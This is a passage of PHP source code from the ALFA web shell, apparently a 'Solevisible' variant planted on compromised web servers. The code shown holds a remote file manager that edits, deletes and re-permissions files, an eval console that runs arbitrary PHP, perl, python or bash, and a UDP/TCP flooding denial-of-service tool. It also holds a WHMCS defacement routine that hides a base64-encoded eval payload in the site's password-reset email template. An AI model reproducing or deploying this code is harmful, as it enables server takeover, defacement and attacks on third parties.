3294$f['perms'].'</td><td><a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'rename\',\'\',\'\',\'\',\''.$f['type'].'\')">R</a> <a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'touch\',\'\',\'\',\'\',\''.$f['type'].'\')">T</a>'.(($f['type']=='file')?' <a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'edit\',\'\',\'\',\'\',\''.$f['type'].'\')">E</a> <a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$raw_name.'\', \'download\')">D</a>':'').'<a class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '.addslashes(rawurldecode($f['name'])).' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \''.$raw_name.'\') : \'\';"> X </a></td></tr>';
3295$l = $l?0:1;
3296$cc++;
3297}
3298echo "<tr><td colspan=7>
3299<input type=hidden name=a value='FilesMan'>
3300<input type=hidden name=c value='".htmlspecialchars((isset($GLOBALS['glob_chdir_false'])?$_POST['c']:$GLOBALS['cwd']))."'>
3301<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
3302<select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>
3303<input type='submit' value=' '>
3304</form></table></div></div>";
3305alfafooter();
3306}
3307function alfaFilesTools(){
3308alfahead();
3309echo '<div class="filestools">';
3310if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
3311$alfa1_decoded = $_POST['alfa1'];
3312$chdir_fals = false;
3313if(!@chdir($_POST['c'])){
3314 $chdir_fals = true;
3315 $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
3316 $alfa_canruncmd = _alfa_can_runCommand(true,true);
3317 if($alfa_canruncmd){
3318 $slashed_alfa1 = addslashes($_POST['alfa1']);
3319 $file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "'.$slashed_alfa1.'"'));
3320 $perm_color_class = alfaEx("if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi");
3321 }
3322}
3323if($_POST['alfa2'] == 'auto'){
3324if(is_array(@getimagesize($_POST['alfa1']))){
3325$_POST['alfa2'] = 'image';
3326}else{
3327 $_POST['alfa2'] = 'view';
3328 if($chdir_fals){
3329 if($alfa_canruncmd){
3330 $mime = explode(":", alfaEx("file --mime-type '".addslashes($_POST['alfa1'])."'"));
3331 $mimetype = $mime[1];
3332 if(!empty($mimetype)){
3333 if(strstr($mimetype, "image")){
3334 $_POST['alfa2'] = 'image';
3335 }
3336 }
3337 }
3338 }
3339}
3340}
3341if($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];}
3342if(@$_POST['alfa2'] == 'mkfile'){
3343$_POST['alfa1'] = trim($_POST['alfa1']);
3344if($chdir_fals&&$alfa_canruncmd){
3345 if(_alfa_is_writable($_POST["c"])){
3346 alfaEx("cd '".addslashes($_POST["c"])."';touch '".addslashes($alfa1_decoded)."'");
3347 $_POST['alfa2'] = "edit";
3348 }
3349}
3350if(!@file_exists($_POST['alfa1'])){
3351$fp = @fopen($_POST['alfa1'], 'w');
3352if($fp){
3353$_POST['alfa2'] = "edit";
3354fclose($fp);
3355}
3356}else{
3357$_POST['alfa2'] = "edit";
3358}
3359}
3360if(!_alfa_file_exists(@$_POST['alfa1'])){
3361echo __pre()."<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('".$_POST['alfa4']."');</script>";
3362alfaFooter();
3363return;
3364}
3365if($chdir_fals){
3366$filesize = $file_info[3];
3367$uid["name"] = $file_info[1];
3368$gid["name"] = $file_info[2];
3369$permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);
3370}else{
3371$uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';
3372$gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';
3373if(!$uid&&!$gid){
3374$uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):'';
3375$gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):'';
3376}
3377$permcolor = alfaPermsColor($_POST['alfa1']);
3378$filesize = @filesize($_POST['alfa1']);
3379if(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){
3380 if(_alfa_can_runCommand()){
3381 list($uid['name'],$gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "'.addslashes($_POST["c"]."/".$_POST["alfa1"]).'"'));
3382 }
3383}
3384}
3385echo '<span class="editor_file_info_vars">Name:</span> '.htmlspecialchars($alfa1_decoded).' <span class="editor_file_info_vars">Size:</span> '.alfaSize($filesize).' <span class="editor_file_info_vars">Permission:</span> '.$permcolor.' <span class="editor_file_info_vars">Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].' <span class="editor_file_info_vars">Directory:</span> '.str_replace("//", "/",($chdir_fals?"":$_POST['c'].'/').$_POST['alfa1']).'<br><br>';
3386if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';
3387if(!_alfa_is_dir($_POST['alfa1'])){
3388$m = array('View', 'Edit', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
3389$ftype = "file";
3390}else{
3391$m = array('Chmod', 'Rename', 'Touch');
3392$ftype = "dir";
3393}
3394foreach($m as $v)
3395echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\'):\'\';"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\')"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a>';
3396echo '<br><br>';
3397switch($_POST['alfa2']){
3398case 'view':
3399@chdir($_POST['c']);
3400echo '<div class="editor-view"><div class="view-content"><p><button style="border-radius:10px;" class="button" onClick="copyToClipboard(\'view_ml_content\');">copy to clipboard</button></p><pre class="ml1" id="view_ml_content">';
3401echo htmlspecialchars(__read_file($_POST['alfa1']));
3402echo '</pre></div></div>';
3403break;
3404case 'highlight':
3405@chdir($_POST['c']);
3406if(@is_readable($_POST['alfa1'])){
3407echo '<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">';
3408$code = @highlight_file($_POST['alfa1'],true);
3409echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div></div></div>';
3410}
3411break;
3412case 'delete':
3413@chdir($_POST['c']);
3414if(@is_writable($_POST['alfa1'])||isset($GLOBALS["glob_chdir_false"])){
3415$deleted = true;
3416if(!@unlink($_POST['alfa1'])){
3417 $deleted = false;
3418 if($alfa_canruncmd){
3419 if(_alfa_is_writable($_POST['alfa1'])){
3420 alfaEx("rm -f '".addslashes($_POST['alfa1'])."'");
3421 $deleted = true;
3422 }
3423 }
3424}
3425if($deleted)echo 'File Deleted...<script>var elem = $("'.$_POST['alfa4'].'").parentNode;elem.parentNode.removeChild(elem);delete editor_files["'.$_POST['alfa4'].'"];</script>';else echo 'Error...';}
3426break;
3427case 'chmod':
3428@chdir($_POST['c']);
3429if(!empty($_POST['alfa3'])){
3430$perms = 0;
3431for($i=strlen($_POST['alfa3'])-1;$i>=0;--$i)
3432$perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));
3433if(!@chmod($_POST['alfa1'], $perms)){
3434if($chdir_fals&&$alfa_canruncmd){
3435alfaEx("cd '".addslashes($_POST["c"])."';chmod ".addslashes($_POST['alfa3'])." '".addslashes($alfa1_decoded)."'");
3436echo('Success!');
3437}else{
3438echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>';}
3439}else{echo('Success!');}
3440}
3441clearstatcache();
3442AlfaNum(8,9,10,7,6,5,4,2,1);
3443if($chdir_fals){
3444 $file_perm = $file_info[5];
3445}else{
3446 $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])),-4);
3447}
3448echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.chmod.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="chmod" value="'.$file_perm.'"><input type=submit value=" "></form>';
3449break;
3450case 'edit':
3451@chdir($_POST['c']);
3452if(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){
3453echo 'File isn\'t writeable';
3454break;
3455}
3456if(!empty($_POST['alfa3'])){
3457$_POST['alfa3'] = substr($_POST['alfa3'],1);
3458$time = @filemtime($_POST['alfa1']);
3459$fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);
3460if($chdir_fals&&$alfa_canruncmd){
3461 $rname = $alfa1_decoded;
3462 $randname = $rname.rand(111,9999);
3463 $filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;
3464 if($fp = @__write_file($filepath ,$_POST['alfa3'])){
3465 alfaEx("mv '".addslashes($filepath)."' '".addslashes($_POST["alfa1"])."';rm -f '".addslashes($filepath)."'");
3466 }
3467}
3468if($fp){
3469echo 'Saved!<br><script>alfa3_="";</script>';
3470@touch($_POST['alfa1'],$time,$time);
3471}
3472}
3473echo '<button class="button" style="border-radius:10px;" onClick="copyToClipboard(\'edit_textarea_content\');">copy to clipboard</button><form id="editor_edit_area" onsubmit="editor(\''.addslashes($alfa1_decoded).'\',\''.$_POST['alfa2'].'\',\'1\'+this.text.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><p><input type="submit" value=" "></p><textarea name="text" id="edit_textarea_content" class="bigarea" onkeydown="saveByKey(event);">';
3474echo htmlspecialchars(__read_file($_POST['alfa1']));
3475echo '</textarea><p><input type="submit" value=" "></p></form>';
3476break;
3477case 'hexdump':
3478@chdir($_POST['c']);
3479$c = __read_file($_POST['alfa1']);
3480$n = 0;
3481$h = array('00000000<br>','','');
3482$len = strlen($c);
3483for ($i=0; $i<$len; ++$i) {
3484$h[1] .= sprintf('%02X',ord($c[$i])).' ';
3485switch ( ord($c[$i]) ) {
3486case 0: $h[2] .= ' '; break;
3487case 9: $h[2] .= ' '; break;
3488case 10: $h[2] .= ' '; break;
3489case 13: $h[2] .= ' '; break;
3490default: $h[2] .= $c[$i]; break;
3491}
3492$n++;
3493if ($n == 32) {
3494$n = 0;
3495if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
3496$h[1] .= '<br>';
3497$h[2] .= "\n";
3498}
3499}
3500echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table></div></div>';
3501break;
3502case 'rename':
3503@chdir($_POST['c']);
3504$alfa1_escape = addslashes($_POST["alfa1"]);
3505$alfa3_escape = addslashes($_POST["alfa3"]);
3506if(!empty($_POST['alfa3'])){
3507$cmd_rename = false;
3508if($chdir_fals&&$alfa_canruncmd){
3509if(_alfa_is_writable($_POST['alfa1'])){
3510$alfa1_escape = addslashes($alfa1_decoded);
3511alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa3'])."'");
3512}else{
3513$cmd_rename = true;
3514}
3515}else{
3516$alfa1_escape = addslashes($_POST["alfa1"]);
3517}
3518if(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){
3519echo 'Can\'t rename!<br>';}else{echo('Renamed!<script>try{$("'.$_POST['alfa4'].'").innerHTML = "<div class=\'editor-icon\'>"+loadType(\''.$alfa3_escape.'\',\''.$ftype.'\',\''.$_POST['alfa4'].'\')+"</div><div class=\'editor-file-name\'>'.$alfa3_escape.'</div>";editor_files["'.$_POST['alfa4'].'"].file = "'.$alfa3_escape.'";d.files.innerHTML = d.files.innerHTML.replace(/\\\''.$alfa1_escape.'\\\'/g, "\''.$alfa3_escape.'\'");d.files.innerHTML = d.files.innerHTML.replace(/value\=\"'.$alfa1_escape.'\"/, \'value\=\"'.$alfa3_escape.'\"\');d.files.innerHTML = d.files.innerHTML.replace(/'.$alfa1_escape.'\<\/a\>/g, "'.$alfa3_escape.'</a>");d.files.innerHTML = d.files.innerHTML.replace(/Are You Sure For Delete # '.$alfa1_escape.' # \?/, "Are You Sure For Delete # '.$alfa3_escape.' # ?");'.($ftype == "dir"?"updateDirsEditor('".$_POST['alfa4']."','".$alfa1_escape."');":"").'}catch(e){console.log(e)}</script>');$alfa1_escape = $alfa3_escape;}
3520}
3521echo '<form onsubmit="editor(\''.$alfa1_escape.'\',\''.$_POST['alfa2'].'\',this.name.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="name" value="'.addslashes(htmlspecialchars(isset($_POST['alfa3'])&&$_POST['alfa3']!=''?$_POST['alfa3']:$alfa1_decoded)).'"><input type=submit value=" "></form>';
3522break;
3523case 'touch':
3524@chdir($_POST['c']);
3525if( !empty($_POST['alfa3']) ) {
3526$time = strtotime($_POST['alfa3']);
3527if($time){
3528$touched = false;
3529if($chdir_fals&&$alfa_canruncmd){
3530 alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa3']))."' '".addslashes($alfa1_decoded)."'");
3531 $touched = true;
3532}
3533if(!@touch($_POST['alfa1'],$time,$time)&&!$touched)
3534echo 'Fail!';
3535else
3536echo 'Touched!';
3537} else echo 'Bad time format!';
3538}
3539clearstatcache();
3540echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.touch.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", ($chdir_fals?$file_info[4]:@filemtime($_POST['alfa1']))).'"><input type=submit value=" "></form>';
3541break;
3542case 'image':
3543@chdir($_POST['c']);
3544echo('<hr>');
3545$file = $_POST['alfa1'];
3546$image_info = @getimagesize($file);
3547if(is_array($image_info)||$chdir_fals){
3548$width = (int)$image_info[0];
3549$height = (int)$image_info[1];
3550if($chdir_fals&&$alfa_canruncmd){
3551 $source = alfaEx("cat '".addslashes($file)."' | base64");
3552 list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '".addslashes($file)."'"));
3553 $mime = explode(":", alfaEx("file --mime-type '".addslashes($file)."'"));
3554 $image_info['mime'] = $mime[1];
3555}else{
3556 $source = __ZW5jb2Rlcg(__read_file($file, false));
3557}
3558$image_info_h = "Image type = <span>[</span> ".$image_info['mime']." <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>";
3559if($width > 800){$width = 800;}
3560echo $content = "<div class='editor-view'><div class='view-content'><center>".$image_info_h."<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:".$image_info['mime'].";base64,".$source."' alt='".$file."'></center></div></div><br>";
3561}
3562break;
3563}
3564echo '</div>';
3565alfaFooter();
3566}
3567function findicon($file,$type){
3568$s = 'http://solevisible.com/icons/';
3569$types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');
3570if($type!='file'){
3571return ($file=='..'?$s.'back.png':$s.'folder.png');
3572}else{
3573$ext = explode('.',$file);
3574$ext = end($ext);
3575$ext = strtolower($ext);
3576return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');
3577}
3578}
3579function alfadlfile(){
3580if(isset($_POST['c'],$_POST['file'])){
3581$basename = rawurldecode(basename($_POST['file']));
3582$_POST['file'] = str_replace("//", "/", $_POST['c'].'/'.$basename);
3583$alfa_canruncmd = _alfa_can_runCommand(true,true);
3584if(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){
3585ob_start("ob_gzhandler", 4096);
3586header("Content-Disposition: attachment; filename=\"".addslashes($basename)."\"");
3587header("Content-Type: application/octet-stream");
3588if(isset($GLOBALS["glob_chdir_false"])){
3589 $randname = $basename.rand(111,9999);
3590 $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
3591 $filepath = $scriptpath."/".$randname;
3592 if(_alfa_is_writable($scriptpath)){
3593 alfaEx("cp '".addslashes($_POST["file"])."' '".addslashes($filepath)."'");
3594 readfile($filepath);
3595 @unlink($filepath);
3596 }else{
3597 alfaEx("cat '".addslashes($_POST["file"])."'");
3598 }
3599}else{
3600 readfile($_POST['file']);
3601}
3602}else echo('Error...!');}}
3603function alfaphpeval(){
3604alfahead();
3605if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){
3606echo '<div class=header>';
3607ob_start();
3608$INI=ini_get_all();
3609print '<table border=0><tr>'
3610.'<td class="listing"><font class="highlight_txt">Param</td>'
3611.'<td class="listing"><font class="highlight_txt">Global value</td>'
3612.'<td class="listing"><font class="highlight_txt">Local Value</td>'
3613.'<td class="listing"><font class="highlight_txt">Access</td></tr>';
3614foreach ($INI as $param => $values)
3615print "\n".'<tr>'
3616.'<td class="listing"><b>'.$param.'</td>'
3617.'<td class="listing">'.$values['global_value'].' </td>'
3618.'<td class="listing">'.$values['local_value'].' </td>'
3619.'<td class="listing">'.$values['access'].' </td></tr>';
3620$tmp = ob_get_clean();
3621$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
3622$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
3623echo str_replace('<h1','<h2', $tmp) .'</div><br>';
3624}
3625if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {
3626echo '<div class=header><style>.p {color:#000;}</style>';
3627ob_start();
3628phpinfo();
3629$tmp = ob_get_clean();
3630$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
3631$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
3632echo str_replace('<h1','<h2', $tmp) .'</div><br>';
3633}
3634if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {
3635echo '<div class=header>';
3636ob_start();
3637$EXT=get_loaded_extensions();
3638echo '<table border=0><tr><td class="listing">'.implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT).'</td></tr></table>'.count($EXT).' extensions loaded';
3639echo '</div><br>';
3640}
3641$lang_html = "";
3642foreach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= '<option value="'.$key.'" '.($_POST["alfa3"]==$key?"selected":"").'>'.$val.'</option>';}
3643echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">'.$lang_html.'</select><br><br><textarea placeholder="file_get_contents(\'/etc/passwd\');" name=code class=bigarea id=PhpCode>'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):'').'</textarea><center><input type="submit" value="" style="margin-top:5px"></center>';
3644echo '</form><pre id=PhpOutput style="'.(empty($_POST['alfa1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
3645if(!empty($_POST['alfa1'])){
3646if($_POST['alfa3']=="php"){
3647ob_start();
3648eval($_POST['alfa1']);
3649$result = htmlspecialchars(ob_get_clean());
3650}elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){
3651 if(isset($_SESSION["eval_tmpdir"])){
3652 $tempdir = $_SESSION["eval_tmpdir"];
3653 }else{
3654 $tempdir = dirname(alfaEx("mktemp"));
3655 $_SESSION["eval_tmpdir"] = $tempdir;
3656 }
3657 $lang = $_POST['alfa3'];
3658 $filename = "temp".rand(11111,99999);
3659 $temp = $tempdir."/".$filename ;
3660 __write_file($filename, $_POST['alfa1']);
3661 $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
3662 @unlink($filename);
3663 @unlink($temp);
3664}
3665echo '<textarea class=bigarea id="PhpCode">'.$result.'</textarea>';
3666}
3667echo '</pre></div>';
3668alfafooter();
3669}
3670function alfahash(){
3671if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
3672if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
3673$stringTools = array(
3674'Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)',
3675'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)',
3676'strrev ( $string )' => 'strrev($s)',
3677'bin2hex ( $string )' => 'bin2hex($s)',
3678'hex2bin ( $string )' => 'hex2bin($s)',
3679'md5 ( $string )' => 'md5($s)',
3680'sha1 ( $string )' => 'sha1($s)',
3681'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)',
3682'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)',
3683'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)',
3684'crypt ( $string )' => 'crypt($s)',
3685'crc32 ( $string )' => 'crc32($s)',
3686'str_rot13 ( $string )' => 'str_rot13($s)',
3687'urlencode ( $string )' => 'urlencode($s)',
3688'urldecode ( $string )' => 'urldecode($s)',
3689'full_urlencode ( $string )' => 'full_urlencode($s)',
3690'htmlspecialchars ( $string )' => 'htmlspecialchars($s)',
3691'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))',
3692'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))',
3693'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))',
3694'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))',
3695'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))',
3696'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))',
3697);
3698alfahead();
3699echo '<div class=header>';
3700echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>";
3701foreach($stringTools as $k => $v)
3702echo "<option value='".htmlspecialchars($v)."' ".($_POST['alfa1']==$v?'selected':'').">".$k."</option>";
3703echo "</select> <input type='submit' value=' '/><br><textarea name='input' style='margin-top:5px' class='bigarea'>".(empty($_POST['alfa1'])?'':htmlspecialchars(@$_POST['alfa2']))."</textarea></form>";
3704if(!empty($_POST['alfa1'])){
3705$string = addslashes($_POST['alfa2']);
3706$string = str_replace('\"','"',$string);
3707$alg = $_POST['alfa1'];
3708$code = str_replace('$s',"'".$string."'",$alg);
3709ob_start();
3710eval('echo '.$code.';');
3711$res = ob_get_contents();
3712ob_end_clean();
3713if(in_array($alg, $stringTools))echo '<textarea class="bigarea" id="PhpCode">'.htmlspecialchars($res).'</textarea>';
3714}
3715echo "</div>";
3716alfaFooter();
3717}
3718function alfados(){
3719alfahead();
3720echo '<div class=header>';
3721echo '<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g(\'dos\',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;"><div class="txtfont">Method : <select name="m" style="width:80px;"><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>';
3722if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){
3723echo __pre();
3724$packets=0;
3725ignore_user_abort(true);
3726$exec_time=(int)$_POST['alfa2'];
3727$time=time();
3728$max_time=$exec_time+$time;
3729$host=$_POST['alfa1'];
3730$port=(int)$_POST['alfa3'];
3731$method=$_POST['alfa4'];
3732$out = str_repeat('X',65000);
3733while(1){
3734$packets++;
3735if(time() > $max_time){
3736break;
3737}
3738$fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);
3739if($fp){
3740fwrite($fp, $out);
3741fclose($fp);
3742}
3743}
3744echo "<center>$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second</center>";
3745echo "</pre>";
3746}
3747echo '</div>';
3748alfafooter();
3749}
3750function __pre(){return('<pre id="strOutput" style="margin-top:5px" class="ml1">');}
3751function alfaIndexChanger(){
3752alfahead();
3753
3754echo '<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,null,\'whmcs\')">| Whmcs | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,\'vb\',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,\'mybb\')">| MyBB | </a></h3></center>';
3755if(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){
3756echo __pre();
3757
3758echo "<center><center><div class='txtfont_header'>| Whmcs |</div>
3759<p><center>".getConfigHtml('whmcs')."<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\">
3760";
3761$table = array('td1' =>
3762 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
3763 'td2' =>
3764 array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
3765 'td3' =>
3766 array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'),
3767 'td4' =>
3768 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
3769 'td5' =>
3770 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
3771 'td6' =>
3772 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
3773);
3774create_table($table);
3775echo "<br><div class='txtfont'>| Your Index |</div><br>
3776<textarea name=index rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
3777<input type='submit' value=' '>
3778</form></center></center>";
3779if(isset($_POST['alfa6'])){
3780$s0levisible="Powered By Solevisible";
3781$dbu = $_POST['alfa6'];
3782$path = $_POST['alfa5'];
3783$fname = $_POST['alfa4'];
3784$dbn = $_POST['alfa7'];
3785$dbp = $_POST['alfa8'];
3786$dbh = $_POST['alfa9'];
3787$index = $_POST['alfa10'];
3788$index = str_replace("\'","'",$index);
3789$deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'"); $solevisible = fopen("'.$fname.'","w"); fwrite($solevisible,$x);';
3790$saveData = __ZW5jb2Rlcg($deface);
3791$Def = '{php}eval(base64_decode("'.$saveData.'"));{/php}';
3792if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
3793$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
3794$soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
3795$soleGet = mysqli_fetch_assoc($soleSave);
3796$tempSave1 = $soleGet['message'];
3797$tempSave = str_replace("'","\'",$tempSave1);
